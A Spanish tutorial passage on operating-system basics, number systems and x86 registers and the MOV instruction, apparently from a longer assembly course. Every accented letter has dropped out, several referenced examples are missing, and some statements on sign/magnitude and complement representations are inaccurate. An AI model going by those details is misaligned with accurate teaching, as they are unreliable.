Primero, se ejecutar el iniciador ROM; en esta memoria se encuentra un programa de arranque siempre disponible (la ROM no puede sobreescribirse) que va a realizar una comprobacin del sistema averiguando cosas como la cantidad de memoria disponible y los perifricos instalados, se asegurar de que funcionan mediante un test, y cargar en memoria el programa de carga del sistema operativo, dando despus el control a este programa (para dar independencia, suele hacerse que el iniciador ROM sea independiente del sistema operativo instalado).
Si hablamos de arranque desde un disco duro, la ROM cargar en memoria lo que conocemos como MBR o Master Boot Record. Esto, es un sector del disco duro (el primer sector fsicamente) de 512 bytes que contiene la tabla de particiones del disco duro. En esta tabla se indicar como se encuentra dividido el HD (podramos tener por ejemplo un disco duro dividido en una particin de 4 Gb y otra de 2Gb, por cualquiera que fuese el motivo). Adems, se va a indicar qu particin es la que contiene el sistema operativo activo que se desea arrancar. As pues, el programa que hay dentro de la MBR lo que va a hacer es segn el contenido de la tabla de particiones (dentro de esta MBR) cargar el "sector boot", programa de carga del sistema operativo, correspondiente al que se desea arrancar. A veces sin embargo queremos tener ms de un sistema operativo instalado, como pueda ser la tpica combinacin Windows/Linux. En esta ocasin, se utilizan programas ms complejos, "gestores de arranque", con los que el usuario puede decidir si quiere arrancar uno u otro.
El programa de la MBR (slo en discos duros, puesto que en un diskette no existe), pasar el control al sector boot o programa de carga del sistema operativo (que ocupa un sector del disco duro, 512 bytes, aunque servir sencillamente para arrancar el resto). Una vez cargados los componentes se pasa a la fase de inicializacin del sistema operativo, lo cual incluye:
- Test del sistema: Completa el test realizado por el iniciador ROM, comprobando tambin que el sistema de ficheros se encuentra en un estado coherente revisando los directorios.
-Establecimiento de estructuras de informacin propias del SO, como los sistemas de gestin de procesos, memoria y E/S.
-Carga en memoria principal de las partes del SO que hayan de encontrarse siempre en memoria (SO residente).
-Creacin de un proceso de inicio o login por cada terminal definido en el sistema as como una serie de procesos auxiliares y programas residentes en memoria; el proceso de login comprobar que el usuario puede acceder al sistema pidindole que se identifique mediante su nombre y clave, aunque esto puede no existir en sistemas Windows.
Servidor de ficheros
Estructura de ficheros
Los datos en un disco duro seran un caos sin una estructura capaz de organizarlos y presentarlos de forma coherente. Cmo podemos saber que el sector fsico 1537 del disco duro pertenece al fichero que buscamos y en qu zonas se encuentra este repartido?. Para ello, en toda particin existe una estructura (llamada FAT o File Allocation Table, Tabla de Localizacin de Ficheros, en sistemas Ms-Dos y Windows, o la estructura de i-nodes en sistemas UNIX) dedicada a esta labor. En ella, se va a mantener un registro de los ficheros que pertenecen a la particin y dnde se encuentran fsicamente.
As, mientras nosotros hacemos referencia a un concepto abstracto como sera "el fichero c:\documentos\datos.txt", cuando accedamos a l nuestro sistema operativo traducir esto junto con la FAT a "los datos que se almacenan en los sectores (x1, x2,... xn) del disco duro y que juntos forman una unidad de tamao Z. En la tabla se indicarn adems, otros datos, como puedan ser los atributos del fichero (slo lectura, oculto, o los permisos de usuario en UNIX), fechas de creacin y ltima modificacin, tamao, etc.
Sin embargo, sabemos que en el disco duro no encontramos todos los ficheros juntos sino que hay una divisin jerrquica en directorios (me niego a utilizar la palabra "carpetas") y que los ficheros estn relacionados con esos directorios perteneciendo a algunos en particular. En realidad y aunque la implementacin vare segn el sistema operativo, esto es una falsa sensacin; un directorio puede ser un fichero que contenga una serie de nombres, que sern referencia a otros archivos o a otros directorios. As, habra un directorio raiz (el c:\, d:\, etc, o un /
) que contendra toda una serie de ficheros, de los cuales algunos sern directorios. Estos directorios a su vez, sern ficheros que funcionan como almacenes de nombres, de los ficheros que contienen y los directorios que cuelgan de l.
Acceso a ficheros
Cuando deseamos acceder a los contenidos de los ficheros tenemos dos maneras:
- Uso de punteros: Al abrir un archivo para lectura/escritura, el puntero de acceso se dirigir al inicio del fichero. As, si leemos o escribimos en l, la operacin se realizar sobre su primer byte. Si modificamos el puntero para que apunte a la direccin 800 del archivo, escribiremos o leeremos sobre ella; este, es el mtodo clsico de leer y modificar datos contenidos en un soporte fsico.
-Mapeado en memoria: Bajo varias denominaciones (mapeado en memoria, Memory File Mapping, proyeccin de ficheros en memoria) se esconde un mtodo muchsimo ms cmodo que el de punteros y que en Windows 95 supone uno de los grandes avances de cara a la programacin (aunque avance entre comillas dado que el sistema lleva aos funcionando bajo sistemas UNIX). Utilizando las ventajas de la memoria virtual, se marcan una serie de pginas de memoria abarcando el tamao del archivo de forma que apuntan a las partes del disco duro donde ste se halla. El programador escribir o leer directamente de estas zonas de memoria como si lo hiciera del fichero; cuando los datos solicitados no se encuentren en memoria (lo cual sucede siempre que se accede a una zona del archivo por primera vez) se generar un fallo de pgina y estos sern cargados desde el disco duro, modificndose o leyndose aquello que haya sido solicitado por el programa. Cuando el fichero se cierra, se guardarn los cambios realizados en memoria.
Es evidente que el mtodo de acceso mediante mapeado en memoria es mucho ms cmodo dado que no hay que llamar a funciones que cambien el puntero de lugar, funciones que escriban y funciones que lean, sino que basta con escribir y leer en una zona de memoria accediendo directamente a todos los contenidos del fichero.
Acceso a directorios
Las funciones para leer de un directorio varan segn el sistema operativo; hay que reconocer aqu que a bajo nivel (ensamblador) las funciones de las que estn dotados los sistemas Windows son bastante ms sencillas que las de un Linux:
-Sistema tipo-Windows: Leer datos de un directorio es tan sencillo como usar las funciones FindFirst y FindNext que proporcionan los primeros y siguientes archivos coincidentes con el patrn dado por el usuario. Podramos por ejemplo indicar que queremos buscar "*.exe" (todos los ficheros con extensin exe), y con la primera llamada a FindFirst y las siguientes iramos obtenindolos todos.
-Sistema tipo-Linux: Tenemos una estructura interna llamada Dirent, entrada de directorio, a la que accederemos mediante la funcin ReadDir. El problema de esta funcin es la mala documentacin presente a este respecto, lo que hace algo ms difcil su manejo (readdir hace una lectura secuencial de cada entrada del directorio, sea esta fichero, directorio, etc). Personalmente, para poder utilizarla tuve que echarle un vistazo al cdigo fuente de Linux para ver cmo funcionaba realmente esta estructura Dirent de cara a la programacin en ensamblador.
Procesos
Concepto de un proceso
Podemos definir un proceso como un programa en ejecucin; el objetivo de un sistema operativo es al fin y al cabo crear, ejecutar y destruir procesos de acuerdo a los deseos de los usuarios, por tanto es este un concepto fundamental en el estudio de los SSOO; podemos definir entonces proceso tambin como la unidad de procesamiento gestionada por el SO.
En cada procesador van a mantenerse una serie de estructuras de informacin que permitan identificar sus caractersticas y los recursos que tiene asignados. Una buena parte de ellas van a estar en el Bloque de Control de Proceso o BCP, que contiene (en el ejemplo tipo UNIX) informacin como la siguiente:
-Identificador de proceso: Se trata del pid, un nmero nico que etiqueta al proceso para no ser confundido con ningn otro (tambin se va a almacenar el pid del proceso padre, es decir, del que creo a ste).
-Identificador de usuario: Conocido tambin como uid, identifica de forma inequvoca al usuario que inici el proceso.
-Estado de los registros: Situacin actual de los registros del procesador (til en la multitarea puesto que al volver a la ejecucin de un proceso que se haba dejado de atender, han de reponerse estos registros para seguir sin problemas).
-Descriptores: De ficheros abiertos indicando los que est manejando el fichero, de segmentos de memoria asignados y de puertos de comunicacin abiertos.
Podemos resumir por tanto un proceso como un conjunto que abarca por un lado los segmentos de memoria en los que residen cdigo y datos del proceso (imagen de memoria o core image), por otro lado el contenido de los registros del modelo de programacin y finalmente el BCP ya mencionado.
Jerarqua de procesos
Existe un proceso de inicio original a partir del cual se crean los dems; podramos entonces describir el listado de procesos como un rbol en el que un proceso originario da lugar a otros que a su vez crean ms. Cuando un proceso A solicita que al sistema operativo la creacin de otro proceso B, se dir entonces que A es padre del proceso B, y que B es hijo del A (y el padre podr si lo desea matar a su proceso hijo).
Multitarea
Dependiendo de las tareas y usuarios simultneos, los sistemas operativos pueden ser:
-Monotarea: Tambin monoproceso, ya que slo permiten que haya un proceso en cada momento. Un ejemplo tpico de esto sera Ms-Dos.
-Multitarea: O multiproceso, permitiendo que existan varios procesos activos al mismo tiempo, encargndose el sistema operativo de repartir el tiempo de procesador entre ellos.
-Monousuario: Slo un usario puede ser soportado a la vez, pudiendo no obstante ser mono o multiproceso.
- Multiusuario: En ellos, el sistema operativo soporta varios usuarios a la vez en distintos terminales; un sistema as, es obligatoriamente multitarea.
La multitarea, se basa en el hecho de que en todo proceso que ejecutemos siempre van a haber espacios en los que el microprocesador no tiene nada que hacer; as, cuando se est esperando una operacin de lectura del disco duro el procesador no estar haciendo nada til con lo que su tiempo puede ser utilizado para otras tareas. As pues, tenemos un modelo ms eficiente para la multitarea que simplemente asignar un trozo de tiempo a cada proceso; podemos adaptarnos a su funcionamiento usando sus tiempos de uso de la E/S en ejecutar otros procesos.
Un fichero ejecutable va normalmente a mantener una estructura que va a incluir las siguientes partes:
-Cabecera: Contiene informacin acerca del ejecutable, como el estado inicial de los registros, descripciones con tamao y localizacin de cdigo y datos en el archivo, lugar de inicio de la ejecucin del programa, etc.
-Cdigo: Aquello que al ejecutar el proceso va a ser ejecutado por el sistema operativo; habr un punto de comienzo o entry point que es donde se empieza a ejecutar.
-Datos: Existen de dos tipos; los datos inicializados por un lado van a ocupar espacio en disco, se trata de datos que poseen valor desde un principio. Los datos sin inicializar no ocupan espacio en el fichero, sino que va a reservrseles una porcin de memoria para que el programa pueda utilizarlos (sern inicializados desde el propio cdigo).
-Tabla de importaciones: Har referencia a aquellas funciones que el ejecutable necesita de las libreras del sistema operativo. El motivo de no incluir estas funciones en el propio cdigo es sencillo; si hay 100 ejecutables que usan la misma funcin es mucho ms eficiente cargar la librera que las contiene cuando uno de ellos es ejecutado que almacenar el cdigo de esta funcin en el cdigo de cada ejecutable. En este caso habremos usado 100 veces menos espacio, puesto que la librera slo tiene que estar en el disco duro una vez para que pueda ser utilizada por los ejecutables.
As pues, cuando se inicie un proceso el sistema operativo asignar un espacio de memoria para albergarlo, seleccionar un BCP libre de la tabla de procesos rellenndolo con el pid y uid, descripcin de memoria asignada y dems, y finalmente cargar en el segmento de cdigo en memoria el cdigo y las rutinas necesarias de sistema, y los datos en el segmento de datos contenido en el fichero, comenzando a ejecutar en su punto inicial. Adems, el proceso recin iniciado tendr una serie de variables propias que se pasan al proceso en el momento de su creacin como puedan ser en UNIX algunas como PATH, TERM o HOME, adems de los parmetros directamente pasados a travs del shell.
Seguridad
Existen dos grandes mecanismos para proteger la informacin y evitar el acceso por parte de usuarios a recursos para los que no han sido habilitados. Podramos dividirlos en dos tipos; por un lado los que se llevan a cabo por parte del procesador, y por otro los que dependen del sistema operativo.
En un microprocesador como el 80x86, es decir, el PC comn, existen cuatro modos diferentes de ejecucin o rings, de los que slo se utilizan dos (el 0 y el 3). El ring0 es el modo privilegiado de ejecucin, mientras que el ring3 es el modo de usuario. Cuando el procesador se ejecuta en modo supervisor o ring0, puede acceder a la zona del kernel, escribir sobre ella si la desea, controlar cualquier proceso... sin embargo en ring3 o modo usuario hay una gran cantidad de limitaciones que evitan que se pueda acceder a zonas no permitidas del sistema.
Por ejemplo, un micro ejecutndose en modo usuario no podr modificar en memoria el cdigo base del sistema operativo ni realizar varias operaciones prohibidas, como acceder directamente a los perifricos (este modo es en el que normalmente estamos ejecutando). Cuando queramos realizar una lectura del disco duro entonces lo que haremos ser llamar a una interrupcin pidiendo ese servicio. Qu har entonces el sistema operativo?. Dar control a la zona del kernel dedicada a tratar esa interrupcin (y por tanto en esta ocasin de leer del disco duro), pasando a modo supervisor para que se pueda realizar su funcin. Al terminar el procesamiento de la interrupcin, el micro volver al estado de usuario y continuar ejecutando el programa; se trata de un mtodo
infalible si est bien implementado, para que el usuario del ordenador jams pueda ser supervisor excepto en aquellas ocasiones que el sistema operativo lo permita.
Algunos sistemas operativos permiten el acceso a distintos usuarios mediante un mecanismo llamado autenticacin, que se puede basar en cosas que conoce el usuario (preguntar por un password, por ejemplo) o mediante tcnicas ms complejas como tarjetas de identificacin o biometra (reconocimiento de una caracterstica fsica del usuario como su huella dactilar, pupila, etc).
Este sistema adquiere mucha potencia cuando se suma a un sistema fuerte de proteccin de ficheros; en los sistemas UNIX, cada fichero tiene un dueo y una serie de permisos de acceso que consisten en 9 bits: "rwx rwx rwx". El primer bloque de tres bits se refiere al usuario que es dueo del fichero (r es read, lectura, w es write, escritura, y x es exec, ejecucin), el segundo bloque al grupo de usuarios al que pertenece el dueo del fichero y el tercero al resto del mundo. As, supongamos este fichero:
El archivo datos.txt pertenecera entonces al usuario Tifaret, el cual tendr derechos de lectura y escritura sobre l. Todos aquellos usuarios pertenecientes a su mismo grupo de usuarios (Arcontes), tendrn permiso de lectura. Finalmente, el resto de usuarios del sistema no podr acceder a este fichero.
Diferente es cuando estos permisos se aplican sobre un directorio; en este caso siguen habiendo nueve bits pertenecientes a usuario, grupo y resto de usuarios, pero la r especifica que el directorio se puede leer (hacer un listado de sus contenidos), la w que se puede aadir o borrar ficheros en l, y la x que se puede atravesar para acceder a ficheros alojados a partir de l.
4 - Sistemas de numeracin
El sistema decimal no tiene porqu ser el mejor; es sencillamente al que estamos acostumbrados. Para programar en ensamblador habr que trabar amistad con otros dos sistemas, o al menos conocerlos algo por encima. Esos sistemas, son el binario y el hexadecimal. Sistema binario Mientras que el sistema decimal utiliza diez cifras, los nmeros del 0 al 9, para representar la informacin, el sistema binario slo va a tener dos cifras; as, los nicos signos con los que escribiremos en binario sern el 0 y el 1. As, un nmero perfectamente vlido en binario sera el "100110". Ahora, cmo traducimos de binario a decimal y a la inversa? Un nmero como 100110 es muy bonito pero nos expresa ms bien pocas cosas. S, podemos decir que si a cada una de estas cifras le pusiramos una etiqueta, el 0 podra significar falso y el 1 verdadero; esta es una de las grandes utilidades del sistema binario, cada cifra puede servirnos para almacenar informacin en el sentido de si algo es cierto o no. Pero pasemos a traducirlo, y primero para ello vamos a ver el sentido de la numeracin decimal. Pongamos el nmero 3741 y preguntmonos cmo hemos obtenido su valor; est claro, 3741 es lo mismo que 3x1000 + 7x100 + 4x10 + 1x1. Cada vez que nos desplazamos en una posicin a la izquierda, se aade un cero a la derecha del uno inicial que no afecta en su valor a la ltima cifra (igualmente, 752 sera 7x100 + 5x10 + 2x1). Ahora veamos el binario; como tiene dos cifras en lugar de las diez del decimal, es de suponer que el primer dgito, el ms a la derecha, valdr su valor multiplicado por 1 (2 elevado a cero, tal y como en el decimal era 10 elevado a cero). El siguiente dgito ser 2 elevado a uno, es decir, 2. Y as irn valiendo 2, 2x2, 2x2x2, etc. Ms sencillo, con algunos ejemplos: 1011: Su valor ser de 1x8 + 0x4 + 1x2 + 1x1 = 8+2+1 = 11 decimal. 1100: 1x8 + 1x4 + 0x2 + 0x1 = 8 + 4 = 12 decimal. 11010111: 1x128 + 1x64 + 0x32 + 1x16 + 0x8 + 1x4 + 1x2 + 1x1 = 128 + 64 + 16 + 4 + 2 + 1 = 215 decimal. Como es sencillo observar, mientras que el nmero ms a la derecha (o bit menos significativo si lo empezamos a aplicar a la informtica) vale 1, cada vez que nos desplazamos a la izquierda el valor de esa cifra es el doble del anterior; as, el segundo bit menos significativo valdr 2 si la cifra es "1", el siguiente 4, y as 8, 16, 32, 64, 128, 256, 512, 1024, 2048, 4096, 8192, 16384, 32768, 65536...
Sistema hexadecimal Acabamos de ver un sistema numrico con muchos menos smbolos de lo habitual ( tan slo el 0 y el 1 !). Ahora toca hacer al contrario; el sistema hexadecimal tiene nada menos que 16 smbolos. Estos, se representarn mediante los nmeros del 0 al 9, y las letras de la A a la F. As, el 10 decimal ser la A hexadecimal, y el F hexadecimal un 15. El sistema para traducir de hexadecimal a decimal ser del mismo estilo que lo que hacamos antes; la cifra ms a la derecha del nmero ser multiplicada por 16 elevado a 0 (o sea, por uno), la siguiente por 16, la siguiente por 16x16, etc. Nada, no obstante, como una buena calculadora: E07F: Equivaldr a 14x4096 + 0x256 + 7x16 + 15 = 57344 + 112 + 15 = 57471 decimal. Una curiosa coincidencia entre los sistemas hexadecimal y binario, y que hace fcil la traduccin entre ambos, es que cada dos cifras hexadecimales corresponden exctamente a un byte (ocho bits) de informacin binaria, haciendo la traduccin entre ambos sistemas casi automtica. Hagamos una pequea tabla: || Binario || Hexadecimal || || 0001 || 1 || || 0010 || 2 || || 0011 || 3 || || 0100 || 4 || || 0101 || 5 || || 0110 || 6 || || 0111 || 7 || || 1000 || 8 || || 1001 || 9 || || 1010 || A || || 1011 || B || || 1100 || C || || 1101 || D || || 1110 || E || || 1111 || F || Con esto en cuenta (alguno se habr dado cuenta de cmo avanzan los nmeros en binario viendo esta tabla), se puede hacer una traduccin casi automtica entre ambos sistemas. En el ejemplo anterior: E07F -> 1110 0000 0111 1111 Por ello vamos a usar bastante estos sistemas, y de hecho el hexadecimal se va a utilizar habitualmente al hacer referencia a posiciones de memoria o valores; por ejemplo un registro de 32 bits se puede representar con un dgito hexadecimal de 8 cifras. La clave reside en que sabemos que ningn nmero de 8 cifras hexadecimales ocupa ms de 32 bits,
lo cual hace muy compacto este mtodo de representacin. A continuacin, algn otro ejemplo de traduccin: 0ABCDh -> 1010101111001101b (usaremos a menudo una h o una b al final del nmero para destacar que son nmeros hexadecimales o binarios; es bueno acostumbrarse a esta forma de representarlos o en caso del hexadecimal tambin a 0xABCD, puesto que son las formas ms comunes en que un ensamblador que usemos para programar va a identificar que nos estamos refiriendo a valores en estos sistemas de numeracin). 1101111010101101b -> 0DEADh 0001001100110111b -> 01337h Signo/Magnitud Con los nmeros binarios tenemos un problema: no sabemos representar nmeros negativos. As pues, se han ideado una serie de sistemas que pretenden solucionar este problema, el ms sencillo de los cuales es el signo/magnitud. En este sistema, la primera cifra del nmero har de signo -. Entonces, un byte nos permitir, haciendo el bit ms significativo (el que est ms a la izquierda) el signo negativo o positivo, tendremos un rango que ir de 127 a 127 (sin signo ira de 0 a 255), teniendo dos representaciones para el 0 (00000000 y 100000000). Tomaremos entonces, como signo - el 1. As, ser tan sencillo como en los siguientes ejemplos: 01101010b -> 106 decimal 10000010b -> -2 decimal 00000010b -> 2 decimal 10000111b -> -7 decimal 100000000b, 0000000b -> 0 decimal El problema de esta representacin, reside en que no se pueden realizar restas con facilidad; no voy a pararme a explicar cmo se resta en binario - se deduce de todas formas fcilmente de la resta decimal -, pero simplemente decir que no se realiza de forma coherente con este sistema. Complemento a 1 Un sistema mejorado para la representacin de nmeros negativos (aunque ya veremos como todo esto va haciendo ms compleja su interpretacin) es el complemento a 1. En ella lo que se hace bsicamente es, para representar el negativo de un nmero, el -X, invertir absolutamente todos los bits que lo forman (excepto el primero, que como en
Signo/Magnitud ser 1 para el negativo y 0 para el positivo). Ejemplos de esta representacin: 01101010b -> 106 decimal 11111110b -> -1 decimal (si comparamos con el signo/magnitud, este sera 10000001, es decir, que lo que hemos hecho es darle la vuelta a las 7 ltimas cifras del nmero). 11111000b -> -7 decimal Complemento a 2 El algoritmo de representacin binaria de complemento a 2, consiste en una mejora del complemento a 1. Se representar el negativo de un nmero, ese -X, invirtiendo todos los bits que lo forman excepto el primero que marca signo, y en caso de hacerlo de positivo a negativo, sumndole 1 (restando 1 en otro caso). El porqu de esta representacin es sencillo y tiene que ver con los motivos que nos llevan a rechazar los dos anteriores como menos vlidos; este es el nico sistema en el que si se suman un nmero y su opuesto se obtiene 0, lo cual le da gran consistencia aritmtica. En el caso de complemento a 1, si sumsemos 11111110b (-1) y 00000001b (1), el resultado es 11111111b y no 00000000b (podramos considerar todo 1s como otra forma del 0, pero tener dos representaciones del 0 sigue siendo aritmticamente un problema). Sin embargo, en complemento a 2, si sumamos 11111111b (-1) y 00000001b (1), el resultado es 00000000b, lo que buscbamos. Algunos ejemplos de representacin: 11111101b -> -3 decimal 11111110b -> -2 decimal 00000011b -> 3 decimal 01111111b -> 127 decimal Representacin prctica Este ltimo punto, tan slo pretende destacar las formas en las que se suelen representar los nmeros hexadecimales y binarios; alguna de estas notaciones la he utilizado ya ms atrs, pero no est mal recapitular y dejar las cosas claras: -Notacin binaria (comn): Los nmeros binarios includos dentro de cdigo ensamblador se representan con una "b" al final del bloque de 0's y 1's. -Notacin hexadecimal (comn): La ms comn, slo tiene dos reglas: la primera, que ha de aadirse una "h" al final del nmero para distinguir que es hexadecimal. En segundo lugar, si la primera cifra es una letra (por ejemplo, ABCDh), se ha de incluir un 0 al
principio (lo cual indica que se trata de un valor numrico al compilador; la forma correcta pues sera escribir 0ABCDh). -Notacin hexadecimal (alternativa): Es la que nos encontramos en el formato AT&T (programas como el GNU Assembler, los desensamblados de GDB, etc), por lo que la veremos menos (NASM, el ensamblador para Linux, permite esta notacin y la comn de Intel). En esta notacin no se escribe una h al final del nmero sino que simplemente se hace que empiece por "0x". As, el 0ABCDh del anterior formato se escribira como 0xABCD, a secas.
Procesadores CISC/RISC
Segn el tipo de juego de instrucciones que utilicen, podemos clasificar los microprocesadores en dos tipos distintos:
-RISC: Aquellos que utilizan un juego reducido de instrucciones. Un ejemplo de ello sera el ensamblador del Motorola 88110, que carece por ejemplo de ms saltos condicionales que "salta si este bit es 1" y "salta si este bit es 0". Por un lado se obtiene la ventaja de que en cierto modo uno se fabrica las cosas desde un nivel ms profundo, pero a veces llega a hacer la programacin excesivamente compleja.
-CISC: Son los que usan un juego de instrucciones ampliado, incluyndose en esta clasificacin el lenguaje ensamblador de los 80x86 (el PC comn de Intel, AMD, Cyrix...). Para el ejemplo usado antes, en el asm de Intel tenemos 16 tipos distintos de salto que abstraen el contenido del registro de flags y permiten comparaciones como mayor que, mayor o igual que, igual, menor, etc.
Existen dos formas de almacenar datos en memoria, llamados Little Endian y Big Endian. En el caso de los Big Endian, se almacenan tal cual; es decir, si yo guardo en una posicin de memoria el valor 12345678h, el aspecto byte a byte de esa zona de memoria ser ??,12h,34h,56h,78h,??
El caso de un Little Endian - y el PC de sobremesa es Little Endian, por cierto -, es distinto. Byte a byte, los valores son almacenados "al revs", el menos significativo primero y el ms significativo despues. Normalmente no nos va a afectar puesto que las instrucciones hacen por si mismas la conversin, pero s hay que tenerlo en cuenta si por ejemplo queremos acceder a un byte en particular de un valor que hemos guardado como un valor de 32 bits (como sera el caso de 12345678h). En ese caso, en memoria byte a byte quedara ordenado como ??,78h,56h,34h,12h,??.
En las arquitecturas tipo 80x86 (esto es, tanto Intel como AMD o Cyrix, que comparten la mayora de sus caractersticas en cuanto a registros e instrucciones en ensamblador), tenemos una serie de registros comunes; con algunos de ellos podremos realizar operaciones aritmticas, movimientos a y desde memoria, etc etc. Estos registros son:
EAX: Normalmente se le llama "acumulador" puesto que es en l donde se sitan los resultados de operaciones que luego veremos como DIV y MUL. Su tamao, como todos los que vamos a ver, es de 32 bits. Puede dividirse en dos sub-registros de 16 bits, uno de los cuales (el menos significativo, o sea, el de la derecha) se puede acceder directamente como AX. A su vez, AX podemos dividirlo en dos sub-sub-registros de 8 bits, AH y AL:
EBX: Aqu sucede lo mismo que con EAX; su divisin incluye subregistros BX (16 bits), BH y BL (8 bits).
ECX: Aunque este registro es como los anteriores (con divisiones CX, CH y CL), tiene una funcin especial que es la de servir de contador en bucles y operaciones con cadenas.
EDX: Podemos dividir este cuarto registro "genrico" en DX, DH y DL; adems, tiene la caracterstica de que es aqu donde se va a guardar parte de los resultados de algunas operaciones de multiplicacin y divisin (junto con EAX). Se le llama "puntero de E/S", dada su implicacin tambin en acceso directo a puertos.
ESI: Se trata de un registro de 32 bits algo ms especfico, ya que aunque tiene el sub-registro SI (16 bits) refirindose a sus bits 0-15, este a su vez no se divide como lo hacan los anteriores en sub-sub-registros de 8 bits. Adems, ESI va a servir para algunas instrucciones bastante tiles que veremos, como LODSX, MOVSX y SCASX (operando origen siempre)
EDI: Aplicamos lo mismo que a ESI; tenemos un "DI" que son los ltimos 16 bits de EDI, y una funcin complementaria a ESI en estos MOVSX, etc (el registro ESI ser origen, y el EDI, el operando destino).
EBP: Aunque no tiene ninguna funcin tan especfica como ESI y EDI, tambin tiene su particularidad; la posibilidad de que se referencien sus bits 0-15 mediante el sub-registro BP.
EIP: Este es el PC (Program Counter) o Contador de Programa. Esto es, que en este registro de 32 bits (que no puede ser accedido por mtodos normales) se almacena la direccin de la prxima instruccin que va a ejecutar el procesador. Existe tambin una subdivisin como "IP" con sus 16 bits menos significativos como con EBP, EDI, etc, pero no lo vamos a tener en cuenta; en un sistema como Linux o Windows se va a usar la combinacin CS:EIP para determinar lo que hay que ejecutar siempre, y slo en sistemas antiguos como Ms-Dos se utiliza el CS:IP para ello.
ESP: Se trata del registro de pila, indicando la direccin a la que esta apunta (que s, que lo de la pila se explica ms tarde).
Adems de estos registros, tenemos otros llamados de segmento, cuyo tamao es de 16 bits, y que se anteponen a los anteriores para formar una direccin virtual completa. Recordemos en cualquier caso que estamos hablando de direcciones virtuales, as que el procesador cuando interpreta un segmento no est operando con nada; simplemente se hace que direcciones de la memoria fsica se correspondan con combinaciones de un segmento como puede ser CS y un registro de direccin como puede ser EIP. La funcin de estos registros de segmento es la de separar por ejemplo datos de cdigo, o zonas de acceso restringido. As, los 2 ltimos bits en un registro de segmento indican normalmente el tipo de "ring" en el que el procesador est corriendo (ring3 en windows es usuario, con lo que los dos ltimos bits de un segmento reservado a un usuario seran "11"... ring0 es supervisor, con lo que los dos ltimos bits de un segmento con privilegio de supervisor seran "00")
-CS es el registro de segmento de ejecucin, y por tanto CS:EIP es la direccin completa que se est ejecutando (sencillamente anteponemos el CS indicando que nos estamos refiriendo a la direccin EIP en el segmento CS).
-SS es el registro de segmento de pila, por lo que tal y como suceda con CS:EIP, la pila estar siendo apuntada por SS:ESP.
-DS normalmente es el registro de datos. Poniendo ya un ejemplo de acceso con la instruccin ADD (sumar), una forma de utilizarla sera "add eax,ds:[ebx]", que aadira al registro EAX el contenido de la direccin de memoria en el segmento DS y la direccin EBX.
-ES, al igual que FS y GS, son segmentos que apuntan a distintos segmentos de datos, siendo los dos ltimos poco utilizados.
Tenemos algunos otros registros, como el de flags que se detallar en un apartado especfico (si se recuerda del captulo 1 la descripcin genrica, contiene varios indicadores que sern muy tiles).
Finalmente, estn (aunque probablemente no los usaremos), los registros del coprocesador (8 registros de 80 bits que contienen nmeros representados en coma flotante, llamados R0..R7), el GDTR (global descriptor table) e IDTR (interrupt descriptor table), los registros de control (CR0, CR2, CR3 y CR4) y algunos ms, aunque como digo es difcil que lleguemos a usarlos.
Usos de MOV
Vamos con algo prctico; la primera instruccin en ensamblador que vamos a ver en detalle. Adems, MOV es quiz la instruccin ms importante en este lenguaje sicontamos la cantidad de veces que aparece.
Su funcin, es la transferencia de informacin. Esta transferencia puede darse de un registro a otro registro, o entre un registro y la memoria (nunca entre memoria-memoria), y tambin con valores inmediatos teniendo como destino memoria o un registro. Para ello, tendr dos operandos; el primero es el de destino, y el segundo el de origen. As, por ejemplo:
Esta operacin copiar los 32 bits del registro EBX en el registro EAX (ojo, lo que hay en EBX se mantiene igual, slo es el operando de destino el que cambia). Ya formalmente, los modos de utilizar esta operacin son:
- MOV reg1, reg2: Como en el ejemplo, MOV EAX, EBX, copiar el contenido de reg2 en reg1.
-MOV reg, imm: En esta ocasin se copia un valor inmediato en reg. Un ejemplo sera MOV ECX, 12456789h. Asigna directamente un valor al registro.
-MOV reg, mem: Aqu, se transfiere el contenido de una posicin de memoria (encerrada entre corchetes) al registro indicado. Lo que est entre los corchetes puede ser una referencia directa a una posicin de memoria como MOV EDX, [DDDDDDDDh] o un acceso a una posicin indicada por un registro como MOV ESI, [EAX] (cuando la instruccin sea procesada, se sustituir internamente "EAX" por su contenido, accediendo a la direccin que indica).
Tambin hay una variante en la que se usa un registro base y un desplazamiento, esto es, que dentro de los corchetes se seala con un registro la direccin, y se le suma o resta una cantidad. As, en MOV ECX,[EBX+55] estamos copiando a ECX el contenido de la direccin de memoria suma del registro y el nmero indicado.
Finalmente, se pueden hacer combinaciones con ms de un registro al acceder en memoria si uno de ellos es EBP, por ejemplo MOV EAX,[EBP+ESI+10]
-MOV mem, reg: Igual que la anterior, pero al revs. Vamos, que lo que cogemos es el registro y lo copiamos a la memoria, con las reglas indicadas para el caso en que es al contrario. Un ejemplo sera MOV [24347277h], EDI
-MOV mem, imm: Exctamente igual que en MOV reg, imm slo que el valor inmediato se copia a una posicin de memoria, como por ejemplo MOV [EBP],1234h
La instruccin MOV no se acaba aqu; a veces, vamos a tener problemas porque hay que ser ms especfico. Por ejemplo, la instruccin que puse como ltimo ejemplo, MOV [EBP],1234h, nos dara un fallo al compilar. El problema es que no hemos indicado el tamao del operando inmediato; es decir, 1234h es un nmero que ocupa 16 bits (recordemos que por cada cifra hexadecimal son 4 bits). Entonces, escribimos los 16 bits que corresponden a [EBP], o escribimos 32 bits que sean 00001234h?.
Para solucionar este problema al programar cuando haya una instruccin dudosa como esta (y tambin se aplicar a otras como ADD, SUB, etc, cuando se haga referencia a una posicin de memoria y un valor inmediato), lo que haremos ser indicar el tamao con unas palabras especficas.
En el ensamblador TASM (el ms utilizado para Win32/Dos), ser con la cadena byte ptr en caso de ser de 8 bits, word ptr con 16 bits y dword ptr con 32. Por lo tanto, para escribir 1234h en [EBP] escribiremos MOV word ptr [EBP],1234h. Sin embargo, si quisiramos escribir 32 bits (o sea, 00001234h), usaramos MOV dword ptr [EBP],1234h.
Usando el NASM para linux, olvidamos el "ptr", y los ejemplos anteriores se convertirn en MOV word [EBP],1234h y MOV dword [EBP],1234h.
Recordemos, una vez ms, que un dword son 32 bits (el tamao de un registro), un word 16 bits y un byte, 8 bits.
Referencia a segmentos
Cuando estamos accediendo a una posicin de memoria (y no ya slo en el mbito del MOV), estamos usando tambin un registro de segmento. Normalmente el segmento DS va implcito (de hecho, si en un programa de ensamblador escribimos MOV DS:[EAX],EBX, al compilar obviar el DS: para ahorrar espacio puesto que es por defecto). No obstante, podemos indicar nosotros mismos a qu segmento queremos acceder siempre que hagamos una lectura/escritura en memoria, anteponiendo el nombre del registro de segmento con un signo de dos puntos al inicio de los corchetes.
Vale, tengo un valor en AL que quiero mover a EDX. Puedo hacer un MOV EDX,AL?. Definitivamente no, porque los tamaos de operando son diferentes.
